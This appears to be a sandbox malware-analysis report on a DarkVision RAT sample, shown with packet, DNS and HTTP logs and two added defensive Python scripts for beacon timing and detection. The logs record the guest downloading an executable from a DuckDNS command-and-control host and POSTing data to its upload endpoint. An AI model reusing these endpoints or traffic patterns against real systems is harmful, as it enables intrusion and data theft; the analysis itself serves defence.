Dec 31, 2024 07:33:58.994250059 CET | 8900 | 49960 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:33:58.994319916 CET | 49960 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:33:58.994424105 CET | 49960 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:33:58.999212980 CET | 8900 | 49960 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:02.288903952 CET | 8900 | 49837 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:02.288984060 CET | 49837 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:04.003242970 CET | 49960 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:04.052078009 CET | 8900 | 49960 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:08.138134956 CET | 49985 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:08.143011093 CET | 8900 | 49985 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:08.143213034 CET | 49985 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:08.143325090 CET | 49985 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:08.148123026 CET | 8900 | 49985 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:11.351713896 CET | 8900 | 49898 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:11.351850033 CET | 49898 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:13.128876925 CET | 49985 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:13.176042080 CET | 8900 | 49985 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:17.160901070 CET | 49986 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:17.165990114 CET | 8900 | 49986 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:17.166089058 CET | 49986 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:17.166203976 CET | 49986 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:17.170922995 CET | 8900 | 49986 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:20.367796898 CET | 8900 | 49960 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:20.367896080 CET | 49960 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:22.175811052 CET | 49986 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:22.223989964 CET | 8900 | 49986 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:26.192135096 CET | 49987 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:26.197179079 CET | 8900 | 49987 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:26.197274923 CET | 49987 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:26.197335958 CET | 49987 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:26.202048063 CET | 8900 | 49987 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:29.541743994 CET | 8900 | 49985 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:29.541871071 CET | 49985 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:31.191180944 CET | 49987 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:31.240056038 CET | 8900 | 49987 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:35.223593950 CET | 49988 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:35.228604078 CET | 8900 | 49988 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:35.228715897 CET | 49988 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:35.228838921 CET | 49988 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:35.233654976 CET | 8900 | 49988 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:38.539412975 CET | 8900 | 49986 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:38.539469957 CET | 49986 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:40.222414970 CET | 49988 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:40.271928072 CET | 8900 | 49988 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:44.239310980 CET | 49989 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:44.244210005 CET | 8900 | 49989 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:44.244368076 CET | 49989 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:44.244637966 CET | 49989 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:44.249370098 CET | 8900 | 49989 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:47.537949085 CET | 8900 | 49987 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:47.538028002 CET | 49987 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:49.253659964 CET | 49989 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:49.300044060 CET | 8900 | 49989 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:53.020382881 CET | 49990 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:53.025329113 CET | 8900 | 49990 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:53.025407076 CET | 49990 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:53.025515079 CET | 49990 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:53.030258894 CET | 8900 | 49990 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:56.620379925 CET | 8900 | 49988 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:34:56.620577097 CET | 49988 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:58.035461903 CET | 49990 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:34:58.083920002 CET | 8900 | 49990 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:35:01.473151922 CET | 49991 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:35:01.478063107 CET | 8900 | 49991 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:35:01.478132963 CET | 49991 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:35:01.478245974 CET | 49991 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:35:01.483128071 CET | 8900 | 49991 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:35:05.754363060 CET | 8900 | 49989 | 5.89.185.156 | 192.168.2.5
Dec 31, 2024 07:35:05.754427910 CET | 49989 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:35:06.487932920 CET | 49991 | 8900 | 192.168.2.5 | 5.89.185.156
Dec 31, 2024 07:35:06.539803982 CET | 8900 | 49991 | 5.89.185.156 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 07:33:01.678170919 CET | 58700 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 07:33:01.794889927 CET | 53 | 58700 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 07:33:04.653099060 CET | 60033 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 07:33:04.795844078 CET | 53 | 60033 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 07:34:08.021096945 CET | 62429 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 07:34:08.137520075 CET | 53 | 62429 | 1.1.1.1 | 192.168.2.5
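The TCP and UDP packet tables above are the raw material for two checks an analyst usually wants from a report like this: recovering the five columns when a text export has run them together (Timestamp, Source Port, Dest Port, Source IP, Dest IP with no separator), and measuring how regularly the guest opens new connections to the C2 host, which is what separates a beacon from a one-off download. The script below is an added example, not Joe Sandbox code. Its sample rows are copied from this report's packet tables in the fused export form; 192.168.2.5 is the analysis guest as shown in the report, and the assumption that the guest's end of every flow uses Windows' default dynamic port range (49152-65535) is what lets the parser pick the one plausible split when several port/IP boundaries are numerically valid. The thresholds (at least five connections, jitter within 10% of the median gap) are arbitrary choices for illustration.

```python
"""Undo the column fusion in this report's packet tables and time the outbound connections.

Added example, not Joe Sandbox code. SAMPLE_ROWS is a subset of rows copied from the report's
TCP and UDP tables in the fused form a text export produces; the parser recovers Timestamp,
Source Port, Dest Port, Source IP and Dest IP, then measures how regularly the guest opens new
connections to each destination (a fresh source port to the same ip:port is a fresh connection).
"""
import re
import statistics
from collections import namedtuple
from datetime import datetime

LOCAL_IP = "192.168.2.5"         # the analysis guest, as shown in the report
EPHEMERAL = range(49152, 65536)  # assumption: the guest's end of a flow uses Windows' default dynamic range
Packet = namedtuple("Packet", "ts sport dport sip dip")
ROW_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) CET(?P<head>\d+)\.(?P<tail>[\d.]+)$")

SAMPLE_ROWS = """\
Dec 31, 2024 07:33:01.678170919 CET5870053192.168.2.51.1.1.1
Dec 31, 2024 07:33:01.794889927 CET53587001.1.1.1192.168.2.5
Dec 31, 2024 07:33:03.325331926 CET497048181192.168.2.55.89.185.156
Dec 31, 2024 07:33:03.325372934 CET8181497045.89.185.156192.168.2.5
Dec 31, 2024 07:33:03.828360081 CET497058181192.168.2.55.89.185.156
Dec 31, 2024 07:33:04.796565056 CET497068900192.168.2.55.89.185.156
Dec 31, 2024 07:33:09.800862074 CET497068900192.168.2.55.89.185.156
Dec 31, 2024 07:33:13.833169937 CET497078900192.168.2.55.89.185.156
Dec 31, 2024 07:33:22.848705053 CET497208900192.168.2.55.89.185.156
Dec 31, 2024 07:33:26.161586046 CET8900497065.89.185.156192.168.2.5
Dec 31, 2024 07:33:31.887891054 CET497818900192.168.2.55.89.185.156
Dec 31, 2024 07:33:40.922606945 CET498378900192.168.2.55.89.185.156
Dec 31, 2024 07:33:49.978564024 CET498988900192.168.2.55.89.185.156
Dec 31, 2024 07:33:58.989403963 CET499608900192.168.2.55.89.185.156
Dec 31, 2024 07:34:08.138134956 CET499858900192.168.2.55.89.185.156
Dec 31, 2024 07:34:17.160901070 CET499868900192.168.2.55.89.185.156
Dec 31, 2024 07:34:26.192135096 CET499878900192.168.2.55.89.185.156
Dec 31, 2024 07:34:35.223593950 CET499888900192.168.2.55.89.185.156
Dec 31, 2024 07:34:44.239310980 CET499898900192.168.2.55.89.185.156
Dec 31, 2024 07:34:53.020382881 CET499908900192.168.2.55.89.185.156
Dec 31, 2024 07:35:01.473151922 CET499918900192.168.2.55.89.185.156
"""


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _split_ips(fused):
    """'192.168.2.55.89.185.156' -> [('192.168.2.5', '5.89.185.156')]: chunk 4 holds two fused octets."""
    p = fused.split(".")
    if len(p) != 7 or not all(_octet_ok(o) for o in p[:3] + p[4:]):
        return []
    return [(".".join(p[:3] + [p[3][:i]]), ".".join([p[3][i:]] + p[4:]))
            for i in range(1, len(p[3])) if _octet_ok(p[3][:i]) and _octet_ok(p[3][i:])]


def parse_row(row):
    """Return a Packet for one fused row; raise ValueError unless exactly one split is plausible."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    base, frac = m["ts"].rsplit(".", 1)
    ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")  # %f takes at most 6 digits
    found = set()
    for k in (1, 2, 3):                      # the source IP's first octet is the last 1-3 digits of head
        ports, octet = m["head"][:-k], m["head"][-k:]
        for a in range(1, 6):                # source port is 1-5 digits, dest port is the remainder
            sp, dp = ports[:a], ports[a:]
            if not (_port_ok(sp) and _port_ok(dp)):
                continue
            for sip, dip in _split_ips(f"{octet}.{m['tail']}"):
                # disambiguate: the guest is one end of the flow and its port is ephemeral
                if (sip == LOCAL_IP and int(sp) in EPHEMERAL) or (dip == LOCAL_IP and int(dp) in EPHEMERAL):
                    found.add((int(sp), int(dp), sip, dip))
    if len(found) != 1:
        raise ValueError(f"{len(found)} plausible parses for {row!r}")
    return Packet(ts, *found.pop())


def connection_timing(packets, min_conns=5, max_jitter=0.10):
    """Per (dst ip, dst port): (connections, median gap in s, jitter, periodic).
    jitter = max |gap - median| / median over gaps between successive new connections."""
    first_seen = {}
    for p in packets:
        if p.sip == LOCAL_IP:
            key = (p.dip, p.dport, p.sport)
            first_seen[key] = min(first_seen.get(key, p.ts), p.ts)
    by_dst = {}
    for (dip, dport, _), ts in first_seen.items():
        by_dst.setdefault((dip, dport), []).append(ts)
    report = {}
    for dst, times in by_dst.items():
        times.sort()
        if len(times) < min_conns:
            report[dst] = (len(times), None, None, False)
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = statistics.median(gaps)
        jitter = max(abs(g - med) for g in gaps) / med
        report[dst] = (len(times), med, jitter, jitter <= max_jitter)
    return report


def analyse(rows=SAMPLE_ROWS):
    return connection_timing([parse_row(r) for r in rows.strip().splitlines()])


if __name__ == "__main__":
    for (dip, dport), (n, med, jit, periodic) in sorted(analyse().items()):
        print(f"{dip}:{dport:<5} connections={n:<3} median_gap={med} jitter={jit} {'PERIODIC' if periodic else ''}")
```

Run against the sample rows, 5.89.185.156:8900 comes out with 14 connections about 9.03 s apart and under 7% jitter, while 5.89.185.156:8181 (two connections, the file download) and 1.1.1.1:53 are not flagged. The parser raises rather than guessing when more than one split survives the ephemeral-port rule, which is the right failure mode for evidence handling; if the guest ever used a non-ephemeral source port, the assumption baked into EPHEMERAL would have to be revisited.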
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Dec 31, 2024 07:33:01.678170919 CET | 192.168.2.5 | 1.1.1.1 | 0x410c | Standard query (0) | jholo.duckdns.org | A (IP address) | IN (0x0001) | false
                        Dec 31, 2024 07:33:04.653099060 CET | 192.168.2.5 | 1.1.1.1 | 0x6dc1 | Standard query (0) | jholo.duckdns.org | A (IP address) | IN (0x0001) | false
                        Dec 31, 2024 07:34:08.021096945 CET | 192.168.2.5 | 1.1.1.1 | 0x5b5a | Standard query (0) | jholo.duckdns.org | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Dec 31, 2024 07:33:01.794889927 CET | 1.1.1.1 | 192.168.2.5 | 0x410c | No error (0) | jholo.duckdns.org | | 5.89.185.156 | A (IP address) | IN (0x0001) | false
                        Dec 31, 2024 07:33:04.795844078 CET | 1.1.1.1 | 192.168.2.5 | 0x6dc1 | No error (0) | jholo.duckdns.org | | 5.89.185.156 | A (IP address) | IN (0x0001) | false
                        Dec 31, 2024 07:34:08.137520075 CET | 1.1.1.1 | 192.168.2.5 | 0x5b5a | No error (0) | jholo.duckdns.org | | 5.89.185.156 | A (IP address) | IN (0x0001) | false
                        • jholo.duckdns.org:8181
                        • jholo.duckdns.org
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 5.89.185.156 | 8181 | 5060 | C:\Windows\explorer.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 31, 2024 07:33:01.804835081 CET | 196 | OUT | GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Host: jholo.duckdns.org:8181
                        Dec 31, 2024 07:33:02.471774101 CET | 1236 | IN | HTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:02 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Last-Modified: Mon, 11 Nov 2024 02:14:28 GMT
                        ETag: "f9600-62699a90923c5"
                        Accept-Ranges: bytes
                        Content-Length: 1021440
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 c8 8b 75 ed a9 e5 26 ed a9 e5 26 ed a9 e5 26 f6 34 7b 26 e7 a9 e5 26 e4 d1 62 26 ec a9 e5 26 e4 d1 76 26 fc a9 e5 26 ed a9 e4 26 72 a9 e5 26 f6 34 4e 26 d9 a9 e5 26 f6 34 4f 26 90 a9 e5 26 f6 34 78 26 ec a9 e5 26 52 69 63 68 ed a9 e5 26 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 84 68 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 44 0d 00 00 b6 02 00 00 00 00 00 b8 49 0c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 10 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 [TRUNCATED]
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u&&&4{&&b&&v&&&r&4N&&4O&&4x&&Rich&PEdh1g"DI@0@dn@e`.textBD `.rdata` H@@.datah@.pdata@ef@@.relocz@B


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49705 | 5.89.185.156 | 8181 | 5032 | C:\Windows\explorer.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Dec 31, 2024 07:33:03.833720922 CET | 235 | OUT | POST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 422
                        Dec 31, 2024 07:33:04.517960072 CET | 254 | IN | HTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:04.523140907 CET | 235 | OUT | POST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 417
                        Dec 31, 2024 07:33:04.889858961 CET | 253 | IN | HTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:04.893091917 CET | 235 | OUT | POST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 541
                        Dec 31, 2024 07:33:05.397989988 CET | 253 | IN | HTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
                        Dec 31, 2024 07:33:05.545919895 CET | 235 | OUT | POST /upload.php HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=part
                        Host: jholo.duckdns.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                        Content-Length: 536
                        Dec 31, 2024 07:33:05.917752028 CET | 253 | IN | HTTP/1.1 200 OK
                        Date: Tue, 31 Dec 2024 06:33:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        X-Powered-By: PHP/8.0.30
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/plain;charset=UTF-8
                        Data Raw: 31
                        Data Ascii: 1
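The two sessions above carry most of what a detection engineer needs: a DuckDNS host, HTTP on port 8181, a legacy Firefox-on-Windows-7 user agent, a PE (`MZ`, `application/x-msdownload`) fetched from `/PASSWORDRECOVERY64EXE.EXE`, and repeated multipart POSTs to `/upload.php` with the fixed boundary `part` that the server answers with a single `1`. The following Python is an added example, not part of the Joe Sandbox report, that turns those observations into named findings. The request and response bytes are constructed from the transcripts shown (bodies truncated to what the report prints; the POST bodies are not shown at all); the dynamic-DNS suffix list, the "browser ports" set, the boundary-length threshold and the Windows 7 user-agent heuristic are this example's own assumptions.

```python
"""Added example, not part of the Joe Sandbox report: turn the two HTTP
sessions shown above into named detection findings.

Assumptions (this example's own, not stated on the page): the dynamic-DNS
suffix list, the set of ports a browser normally uses, the boundary-length
threshold and the Windows 7 user-agent heuristic.
"""
import re
from dataclasses import dataclass
from typing import Optional

DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")  # assumption
BROWSER_PORTS = {80, 443, 8080}                                  # assumption
MIN_BROWSER_BOUNDARY = 20  # assumption: browsers emit long random boundaries
WIN7_UA = re.compile(r"Windows NT 6\.1")  # Windows 7, out of support since 2020


@dataclass
class HttpMessage:
    start_line: str
    headers: dict  # header names lower-cased
    body: bytes


def parse_http(raw: bytes) -> HttpMessage:
    """Split one HTTP/1.x message into start line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)


def host_and_port(host_header: str) -> tuple:
    """(hostname, port) from a Host header; port 80 when none is given."""
    if ":" in host_header:
        name, port = host_header.rsplit(":", 1)
        return name.lower(), int(port)
    return host_header.lower(), 80


def classify(req: HttpMessage, resp: Optional[HttpMessage] = None,
             dst_port: Optional[int] = None) -> list:
    """Findings for one request/response pair. dst_port comes from the flow
    record: session 1 above went to 8181 although its Host header has no port."""
    findings = []
    method, path = (req.start_line.split(" ") + ["", ""])[:2]
    host, port = host_and_port(req.headers.get("host", ""))
    port = dst_port or port

    if host.endswith(DYNDNS_SUFFIXES):
        findings.append("dynamic_dns_host")
    if port not in BROWSER_PORTS:
        findings.append("nonstandard_http_port")
    if WIN7_UA.search(req.headers.get("user-agent", "")):
        findings.append("stale_ua")
    if path.lower().endswith(".exe"):
        findings.append("exe_path")

    ctype = req.headers.get("content-type", "")
    boundary = re.search(r"boundary=([^;]+)", ctype)
    if (method == "POST" and ctype.startswith("multipart/form-data") and boundary
            and len(boundary.group(1).strip('"')) < MIN_BROWSER_BOUNDARY):
        findings.append("static_multipart_boundary")

    if resp is not None:
        rtype = resp.headers.get("content-type", "")
        if rtype.startswith("application/x-msdownload") or resp.body[:2] == b"MZ":
            findings.append("pe_download")
        if method == "POST" and len(resp.body) <= 4:
            findings.append("tiny_ack")  # upload sink answering "1"
    return findings


# Constructed from the session transcripts above; bodies are truncated to what
# the report shows (the POST body is not shown at all).
UA = b"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0"
SESSION0_REQ = (b"GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1\r\nConnection: Keep-Alive\r\n"
                b"Accept: */*\r\nUser-Agent: " + UA + b"\r\nHost: jholo.duckdns.org:8181\r\n\r\n")
SESSION0_RESP = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30\r\n"
                 b"Content-Length: 1021440\r\nContent-Type: application/x-msdownload\r\n\r\n"
                 b"MZ\x90\x00\x03\x00\x00\x00\x04\x00")
SESSION1_REQ = (b"POST /upload.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
                b"Content-Type: multipart/form-data; boundary=part\r\nHost: jholo.duckdns.org\r\n"
                b"User-Agent: " + UA + b"\r\nContent-Length: 422\r\n\r\n")
SESSION1_RESP = (b"HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.0.30\r\nContent-Length: 1\r\n"
                 b"Content-Type: text/plain;charset=UTF-8\r\n\r\n1")


def run_report_sessions() -> dict:
    """Classify both sessions, destination port taken from the session table."""
    return {
        "session0": classify(parse_http(SESSION0_REQ), parse_http(SESSION0_RESP), 8181),
        "session1": classify(parse_http(SESSION1_REQ), parse_http(SESSION1_RESP), 8181),
    }


if __name__ == "__main__":
    for name, found in run_report_sessions().items():
        print(name, found)
```

Passing the destination port from the flow record rather than trusting the Host header matters here: session 1 omits the port in `Host:` while the session table shows it went to 8181, so a rule keyed on the header alone would miss the non-standard port on the upload channel.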



                        Target ID:0
                        Start time:01:32:59
                        Start date:31/12/2024
                        Path:C:\Users\user\Desktop\uncrypted.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\uncrypted.exe"
                        Imagebase:0x9a0000
                        File size:1'028'096 bytes
                        MD5 hash:84E8A17E39EF16DCE73DA924CED012D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:01:33:00
                        Start date:31/12/2024
                        Path:C:\Users\user\Desktop\uncrypted.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\uncrypted.exe"
                        Imagebase:0xa90000
                        File size:1'028'096 bytes
                        MD5 hash:84E8A17E39EF16DCE73DA924CED012D5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
